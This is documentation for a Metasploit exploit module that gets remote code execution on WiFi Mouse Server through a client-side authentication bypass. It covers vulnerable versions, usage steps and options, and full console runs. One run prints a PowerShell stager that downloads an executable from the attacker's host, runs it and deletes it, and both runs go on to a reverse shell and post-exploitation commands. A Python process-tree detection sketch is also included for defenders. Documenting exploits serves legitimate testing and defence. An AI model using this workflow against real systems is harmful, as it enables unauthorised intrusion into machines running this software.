## Vulnerable Application

The WiFi Mouse (Mouse Server) from Necta LLC contains an authentication bypass
because authentication is implemented entirely on the client side. By exploiting
this vulnerability, it is possible to open a program on the server (cmd.exe
in our case) and type commands, resulting in RCE.

Versions 1.8.3.4 (current as of module writing) and before are vulnerable.

Version 1.8.3.4 can be downloaded from https://wifimouse.necta.us/apk/MouseServer.exe
at the time of writing.

Version 1.8.3.0 can be downloaded from https://wifimouse.necta.us/apk/MouseServer1.8.3.0.exe

Version 1.8.2.3 can be downloaded from [edb](https://www.exploit-db.com/apps/46b494c56615f48dd09065108d604762-MouseServer.exe) or from https://wifimouse.necta.us/apk/MouseServer1.8.2.3.exe

Version 1.7.8.5 can be downloaded from https://wifimouse.necta.us/apk/MouseServerLatest.exe

## Targets

### Stager

This is Metasploit's cmd stager. It has two flavors, which can be changed through the advanced option
`CMDSTAGER::FLAVOR`.

1. `psh_invokewebrequest` (default): this one types the command and pulls back the payload nice and fast.
You should use it in almost all circumstances.
2. `certutil`: the payload is typed out on the user's screen, which makes this flavor unreliable
(needs ~3.5min of solitude). If the user types anything or moves the focus to another window, the exploit will fail.


## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/windows/misc/wifi_mouse_rce`
4. Set `rhost` and `lhost` as required.
5. Do: `run`
6. You should get a shell as the user who is running Wifi Mouse (Mouse Server).

## Options

### SLEEP

The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen.

### LINEMAX

The length of each line that is sent for processing. While the program
seems to be able to take ~2048, anything more than ~1020 seems to crash the program. 1000 - 1020 should be safe.
Defaults to `1020`.

## Scenarios

### Wifi Mouse (Mouse Server) 1.8.3.4 on Windows 10 using `psh_invokewebrequest` Stager

```
resource (mouse.rb)> use exploits/windows/misc/wifi_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (mouse.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (mouse.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (mouse.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/wifi_mouse_rce) > run

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] 2.2.2.2:1978 - Opening command prompt
[*] 2.2.2.2:1978 - Typing out payload
[*] 2.2.2.2:1978 - Using URL: http://1.1.1.1:8080/qGn4ESH
[*] 2.2.2.2:1978 - Generated command stager: ["powershell.exe -c Invoke-WebRequest -OutFile %TEMP%\\IDcEhcbA.exe http://1.1.1.1:8080/qGn4ESH & %TEMP%\\IDcEhcbA.exe & del %TEMP%\\IDcEhcbA.exe"]
[*] 2.2.2.2:1978 - Command Stager progress - 100.00% done (146/146 bytes)
[*] 2.2.2.2:1978 - Client 2.2.2.2 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.16299.98) requested /qGn4ESH
[*] 2.2.2.2:1978 - Sending payload to 2.2.2.2 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.16299.98)
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 2.2.2.2
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:50211) at 2022-09-21 16:29:06 -0400
[*] 2.2.2.2:1978 - Server stopped.


Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----
          

C:\Windows\system32>whoami
whoami
win10prolicense\windows

C:\Windows\system32>systeminfo
systeminfo

Host Name:                 WIN10PROLICENSE
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.16299 N/A Build 16299
```
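For defenders, the run above leaves a recognizable process tree: the server opens `cmd.exe`, the typed stager starts PowerShell with `Invoke-WebRequest -OutFile`, and the downloaded file then runs from the same shell. The following detection sketch is an added example, not part of the module; it assumes the server process is named `MouseServer.exe`, that process-creation records arrive in chronological order as `(pid, ppid, image, command line)`, and that paths contain no spaces. The sample records are constructed, reusing the file name and URL from the output above.

```python
import re
from ntpath import basename

# Assumption: the server process image is MouseServer.exe (installer file name on this page).
SERVER = "mouseserver.exe"
SHELLS = {"cmd.exe", "powershell.exe"}
IWR = re.compile(r"(?:Invoke-WebRequest|iwr)\b.*?-OutFile\s+(\S+)\s+(https?://\S+)", re.I)

# Constructed process-creation records: (pid, ppid, image, command line).
DROP = r"C:\Users\user\AppData\Local\Temp\IDcEhcbA.exe"
PSH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    (2208, 900, r"C:\Apps\MouseServer\MouseServer.exe", "MouseServer.exe"),
    (5100, 2208, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    (5164, 5100, PSH,
     "powershell.exe -c Invoke-WebRequest -OutFile " + DROP + " http://1.1.1.1:8080/qGn4ESH"),
    (5200, 5100, DROP, DROP),
    # Unrelated admin download started outside the server's process tree.
    (6000, 700, PSH,
     r"powershell.exe -c Invoke-WebRequest -OutFile C:\Tools\setup.msi https://example.com/setup.msi"),
]

def detect(events):
    """Return (rule, pid, detail) findings for process trees rooted at the mouse server."""
    image_of = {}     # pid -> lower-cased image path
    tainted = set()   # pids descended from the server process
    dropped = {}      # lower-cased -OutFile path -> source URL
    findings = []
    for pid, ppid, image, cmdline in events:
        image = image.lower()
        image_of[pid] = image
        from_server = basename(image_of.get(ppid, "")) == SERVER
        if not (from_server or ppid in tainted):
            continue  # only follow descendants of the server
        tainted.add(pid)
        if from_server and basename(image) in SHELLS:
            findings.append(("shell_from_mouse_server", pid, image))
        match = IWR.search(cmdline)
        if match:
            dropped[match.group(1).lower()] = match.group(2)
            findings.append(("download_to_disk", pid, match.group(2)))
        if image in dropped:
            findings.append(("downloaded_file_executed", pid, dropped[image]))
    return findings

if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding)
```

A shell spawned directly by the server process is the highest-signal rule of the three, since it fires regardless of which stager flavor is used.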

### Wifi Mouse (Mouse Server) 1.8.2.3 on Windows 10 using `certutil` Stager

```
resource (mouse.rb)> use exploits/windows/misc/wifi_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (mouse.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (mouse.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (mouse.rb)> set CMDSTAGER::FLAVOR certutil
CMDSTAGER::FLAVOR => certutil
msf6 exploit(windows/misc/wifi_mouse_rce) > set verbose false
verbose => false
msf6 exploit(windows/misc/wifi_mouse_rce) > run

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] 2.2.2.2:1978 - Opening command prompt
[*] 2.2.2.2:1978 - Typing out payload
[*] 2.2.2.2:1978 - Command Stager progress -   1.01% done (1019/100776 bytes)
[*] 2.2.2.2:1978 - Command Stager progress -   2.02% done (2038/100776 bytes)
[*] 2.2.2.2:1978 - Command Stager progress -   3.03% done (3057/100776 bytes)
...
[*] 2.2.2.2:1978 - Command Stager progress -  98.08% done (98843/100776 bytes)
[*] 2.2.2.2:1978 - Command Stager progress -  99.09% done (99862/100776 bytes)
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 2.2.2.2
[*] 2.2.2.2:1978 - Command Stager progress - 100.00% done (100776/100776 bytes)
[*] Command shell session 3 opened (1.1.1.1:4444 -> 2.2.2.2:50926) at 2022-09-04 15:11:29 -0400


Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----
          

C:\Program Files (x86)\MouseServer.exe>whoami
whoami
win10prolicense\windows

C:\Program Files (x86)\MouseServer.exe>systeminfo
systeminfo

Host Name:                 WIN10PROLICENSE
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.16299 N/A Build 16299
```
